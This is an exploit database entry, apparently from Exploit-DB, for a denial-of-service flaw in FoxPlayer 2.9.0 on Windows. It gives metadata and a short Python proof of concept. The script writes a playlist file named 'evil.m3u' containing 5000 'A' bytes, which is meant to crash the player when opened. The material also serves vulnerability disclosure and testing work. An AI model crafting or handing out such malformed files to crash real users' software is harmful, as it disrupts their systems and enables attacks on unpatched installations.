FoxPlayer 2.9.0 - Denial of Service
Author: metacom
type: dos
platform: windows
port:
date_added: 2013-01-06
date_updated: 2013-01-06
verified: 1
codes: OSVDB-80806
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt24000/screenshot-1.png
application_url: http://www.exploit-db.comfox-player-setup.exe
#!/usr/bin/python
# Exploit Title:Denial of Service in FoxPlayer version 2.9.0
# Download link :http://www.foxmediatools.com/installers/fox-player-setup.exe
# Author: metacom
# version: version 2.9.0
# Category: poc
# Tested on: windows 7 German
filename="evil.m3u"
buffer = "\x41" * 5000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()